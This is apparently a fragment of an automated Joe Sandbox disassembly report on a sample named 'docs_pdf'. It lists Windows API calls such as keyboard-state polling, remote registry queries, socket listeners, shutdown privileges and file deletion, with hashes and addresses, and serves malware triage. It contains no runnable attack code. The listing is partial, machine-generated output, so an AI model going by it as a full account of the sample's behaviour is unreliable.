                                                              • Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                              • Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                              • Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
                                                              • Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
                                                              • Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0014825B
                                                            • _memset.LIBCMT ref: 00148270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 001482A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001482DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001482F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 00148316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0014832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014834D
                                                            • CopySid.ADVAPI32(00000000), ref: 00148354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001483AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001483BF
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            APIs
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170737
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001707D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0017086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00170AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170ABA
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00150241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 001502C2
                                                            • GetKeyState.USER32(000000A0), ref: 001502DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 001502F7
                                                            • GetKeyState.USER32(000000A1), ref: 0015030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00150324
                                                            • GetKeyState.USER32(00000011), ref: 00150336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0015034E
                                                            • GetKeyState.USER32(00000012), ref: 00150360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00150378
                                                            • GetKeyState.USER32(0000005B), ref: 0015038A
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
                                                            • Instruction ID: 12fc145a6b5b276578f250e12d960a7d46b43dbdca618fd92a61df2e4693725a
                                                            • Opcode Fuzzy Hash: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
                                                            • Instruction Fuzzy Hash: AD4187249047C9EEFF725AE4C8083A6BAA07B19341F48409DDDD54E5C2DBD459CC8792
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            APIs
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                              • Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00153ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00153B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00153B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00153BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00153BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00153BF5
                                                            Strings
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0015F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0015F6DB
                                                            • _wcscmp.LIBCMT ref: 0015F6EF
                                                            • _wcscmp.LIBCMT ref: 0015F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0015F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0015F7BE
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            APIs
                                                              • Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                              • Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                              • Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0015549B
                                                            Strings
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001665EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001665FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0016661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00166629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00166657
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • _memmove.LIBCMT ref: 0014062F
                                                            • _memmove.LIBCMT ref: 00140744
                                                            • _memmove.LIBCMT ref: 001407EB
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 000F19FA
                                                            • GetSysColor.USER32(0000000F), ref: 000F1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 000F1A61
                                                              • Part of subcall function 000F1290: DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            APIs
                                                              • Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00166AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00166B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00166B34
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0015C69D
                                                            • CoCreateInstance.OLE32(00182D6C,00000000,00000001,00182BDC,?), ref: 0015C6B5
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • CoUninitialize.OLE32 ref: 0015C922
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 86121d16a4277c96c945e43cdd528175bb900816c13b004f160f48086f4d8f73
                                                            • Instruction ID: 122febf1743967b52dc6ab96eb5230df4a46cfe0184e174c33ce710976a650f4
                                                            • Opcode Fuzzy Hash: 86121d16a4277c96c945e43cdd528175bb900816c13b004f160f48086f4d8f73
                                                            • Instruction Fuzzy Hash: 25A12C71108305AFD700EF54CC81EABB7E8EF94704F04496CF6569B1A2DB70EA49CB92
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00131D88,?), ref: 0016C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0016C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
                                                            • Instruction ID: cba9927061bfc130e56767d87d9e3fd3042ddeb085f81fc827215b97ffc27a41
                                                            • Opcode Fuzzy Hash: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
                                                            • Instruction Fuzzy Hash: C8E0EC74600713CFDB204B25DC44A5776E4FF09755F80C43DE899D2750E774D891CAA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 611fcc029bc9957790232ce5f4a2bc0b2ae33923dab6b7b59c093118b7f7f4d0
                                                            • Instruction ID: 8df01e79749eccc8c42f2146b2d3881ef39c8c90ed93daa237ecb054bb223f38
                                                            • Opcode Fuzzy Hash: 611fcc029bc9957790232ce5f4a2bc0b2ae33923dab6b7b59c093118b7f7f4d0
                                                            • Instruction Fuzzy Hash: 35228C715083019FC724DF24C891BAFB7E9BF98304F10491DF99697292DBB1EA45CB92
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0016F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0016F15F
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0016F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0016F22E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 47d48209e1005c09f3043c44d845af60d39b3f4a5b0a34b5edb741dbe323f0a4
                                                            • Instruction ID: 274321712118072de79bc8329ab95fed2b07f1756ec124b41d1d4abbae349196
                                                            • Opcode Fuzzy Hash: 47d48209e1005c09f3043c44d845af60d39b3f4a5b0a34b5edb741dbe323f0a4
                                                            • Instruction Fuzzy Hash: 94518D715083159FD310EF24DC85EABBBE8FF98710F14482DF69597292EB70A909CB92
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0014EB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: 86a12c531e86b82daff587b4a5cddd23b88fd4194e88cacdea00e483c9bcb25b
                                                            • Instruction ID: 9e87bc5e71011d41c63e80f82f46d43fdcf627147b677e579ad8bc93ff15f185
                                                            • Opcode Fuzzy Hash: 86a12c531e86b82daff587b4a5cddd23b88fd4194e88cacdea00e483c9bcb25b
                                                            • Instruction Fuzzy Hash: 2E321775A047059FD728CF29C481A6AB7F1FF48320B15C56EE89ADB3A1D770E981CB44
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001626D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0016270C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: efa20964246347e2c4b72e5cde68afc30d79d462efbacf9f241e333bc22e5c0d
                                                            • Instruction ID: 8b464b793dc7c449bc065f7d5f0e3c7ba0c8e3489288c0db339e7e8af976e6cb
                                                            • Opcode Fuzzy Hash: efa20964246347e2c4b72e5cde68afc30d79d462efbacf9f241e333bc22e5c0d
                                                            • Instruction Fuzzy Hash: FB411771A00A09BFEB24DE94DC85EFBB7BCEB50714F10406EFA05A6140EB709E91D760
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0015B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0015B655
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
                                                            • Instruction ID: 36608a5ca2e74c71e4ab356768b1471a4e2ca29a70234a9fcaa941a7fc2182ad
                                                            • Opcode Fuzzy Hash: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
                                                            • Instruction Fuzzy Hash: F7216235A00518EFCB00DF55D8C0AEEBBB8FF49315F1480A9E905AB351DB319955CF51
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                            • GetLastError.KERNEL32 ref: 00148D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 6fb959970c7d7b92aadb6dd28114759614b6977bce0c36c17c1ffb98bb493ea0
                                                            • Instruction ID: 1904090443c1ae80697089d131cd8c16786bc6637c2feeea800dd2f39aeb5839
                                                            • Opcode Fuzzy Hash: 6fb959970c7d7b92aadb6dd28114759614b6977bce0c36c17c1ffb98bb493ea0
                                                            • Instruction Fuzzy Hash: 6A1194B1814205AFD728DF64DC85D7BB7BDFF48710B20852EF45597651DB70AC81CA60
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0015404B
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00154088
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00154091
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
                                                            • Instruction ID: 86ccee5daf21431630e83a6a79e8d02ad4904c9344a31655016747c7ff63eded
                                                            • Opcode Fuzzy Hash: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
                                                            • Instruction Fuzzy Hash: B51173B1904224FFE7109BE9DC44FABBBBCEB08715F100656BE14E7191C3B4598587A1
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00154C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00154C43
                                                            • FreeSid.ADVAPI32(?), ref: 00154C53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
                                                            • Instruction ID: 9a719a225fee0b071a42c677bc50527df81975bded5a5eeb1ac5df9fedc3f284
                                                            • Opcode Fuzzy Hash: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
                                                            • Instruction Fuzzy Hash: E3F04975A1130CBFDF04DFF0DC89EAEBBBDEF08201F1044A9A905E2681E7706A848B50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e00c707b747590794353619a51409d076fada5e1ea8d2b28a00ef9b2ee2b235
                                                            • Instruction ID: 1063cc90c5099ea442b138d236bfe9669b8ee53c3bc287894088e9ccc890495b
                                                            • Opcode Fuzzy Hash: 0e00c707b747590794353619a51409d076fada5e1ea8d2b28a00ef9b2ee2b235
                                                            • Instruction Fuzzy Hash: 7622C070A0025ACFDB24DF54C484ABEF7F1FF08300F148169EA569B7A2E774A985DB91
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0015C966
                                                            • FindClose.KERNEL32(00000000), ref: 0015C996
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
                                                            • Instruction ID: ae24b8e01d402a4fbd88bbfbb96b1ef71915774ff8aca9ce172851addddf8ef2
                                                            • Opcode Fuzzy Hash: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
                                                            • Instruction Fuzzy Hash: E211A1326046049FD710EF29C845A6AF7E9FF84324F00851EF9A9DB6A1DB30AC05CB81
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A302
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
